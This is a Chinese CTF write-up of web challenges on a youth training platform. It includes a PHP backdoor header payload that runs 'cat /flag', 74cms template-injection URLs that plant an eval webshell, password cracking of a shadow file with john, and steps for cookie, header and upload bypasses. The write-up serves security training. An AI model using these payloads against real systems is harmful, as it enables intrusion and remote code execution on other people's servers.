青少年CTF训练平台-WEB-部分wp

这两天因为别人问了下题目.打开后,闲着没事,去做了两道题目。顺便发出来wp.

Web签到

扫描发现备份文件
青少年CTF训练平台-WEB-部分wp_第1张图片

打开发现flag

在这里插入图片描述

easyupload

直接上传,然后获取flag

青少年CTF训练平台-WEB-部分wp_第2张图片

木马地址,通过扫描目录发现。

在这里插入图片描述青少年CTF训练平台-WEB-部分wp_第3张图片

PHP的后门

直接添加请求头

user-agentt: zerodiumsystem(‘cat /flag’);

青少年CTF训练平台-WEB-部分wp_第4张图片

q1jun的小秘密

连接之后,查找具有suid权限的命令

青少年CTF训练平台-WEB-部分wp_第5张图片

根据提示直接发现flag
在这里插入图片描述
青少年CTF训练平台-WEB-部分wp_第6张图片
青少年CTF训练平台-WEB-部分wp_第7张图片

提示说明没有中文

青少年CTF训练平台-WEB-部分wp_第8张图片

但是仍然错误,查看shadow,通过john破解密码

青少年CTF训练平台-WEB-部分wp_第9张图片
在这里插入图片描述

用户名后有$y,则表明密码已使用 yescrypt 进行哈希处理

指定format参数

john --format=crypt shadow

新手的登录

使用提示的user账号登录之后

青少年CTF训练平台-WEB-部分wp_第10张图片

抓包修改cookie为admin。发包,得到flag

青少年CTF训练平台-WEB-部分wp_第11张图片

吃豆人

访问之后直接查看js文件,

发现base64编码,解码之后发现flag

青少年CTF训练平台-WEB-部分wp_第12张图片
青少年CTF训练平台-WEB-部分wp_第13张图片

F14G

抓包经过测试

验证请求头为: CF-Connecting-IP 参数为IP

青少年CTF训练平台-WEB-部分wp_第14张图片

这个规则比较重要.
青少年CTF训练平台-WEB-部分wp_第15张图片

所以我们直接发包即可

从0-255

青少年CTF训练平台-WEB-部分wp_第16张图片

然后提取flag

青少年CTF训练平台-WEB-部分wp_第17张图片

骑士CMS01

提示弱口令.访问后台

随便输入得到账号密码 为admin/admin

查看版本发现是 74cms v 4.2.111

找到对应版本的POC

青少年CTF训练平台-WEB-部分wp_第18张图片

利用漏洞getshell

url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'
shell地址: /Application/Home/Conf/config.php

青少年CTF训练平台-WEB-部分wp_第19张图片

url: http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',eval($_REQUEST[a]),'$_REQUEST[a]

获取flag

青少年CTF训练平台-WEB-部分wp_第20张图片

POST&GET

青少年CTF训练平台-WEB-部分wp_第21张图片

ezupload

审计代码,发现黑名单中没有 php 后缀.

没有其他校验方式.直接上传即可。


青少年CTF训练平台-WEB-部分wp_第22张图片

这是文件的路径.

$img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext; 

可以爆破出来,关键在于 date的时区在上面已经定义。

date_default_timezone_set('America/Los_Angeles');

为了尽可能的减少请求的次数,

在本地同步模拟发包时间,减小范围

青少年CTF训练平台-WEB-部分wp_第23张图片

这是载荷

青少年CTF训练平台-WEB-部分wp_第24张图片

青少年CTF训练平台-WEB-部分wp_第25张图片

获取flag

青少年CTF训练平台-WEB-部分wp_第26张图片

帝国CMS01

扫描目录发现备份文件

本来以为在里面发现sql文件需要登录后台。

不过在后台目录下面发现shell文件/

在这里插入图片描述

直接访问

获取flag

青少年CTF训练平台-WEB-部分wp_第27张图片

帝国CMS02

扫描目录发现备份文件已经删除了。

尝试弱口令,

admin / 123465789 登录成功。

在首页发现flag

青少年CTF训练平台-WEB-部分wp_第28张图片

帝国CMS03

尝试弱口令,

admin / 123465789 登录成功。

尝试利用 7.5版本的 后台命令执行漏洞
青少年CTF训练平台-WEB-部分wp_第29张图片

创建名为shell.php.mod的文件在本地,内容如下

注意转义,否则会失败

"); ?>

在如下位置上传

青少年CTF训练平台-WEB-部分wp_第30张图片

青少年CTF训练平台-WEB-部分wp_第31张图片

获取flag

青少年CTF训练平台-WEB-部分wp_第32张图片

你可能感兴趣的:(CTF,CTF,信息安全,职业技能,信息安全与评估,php)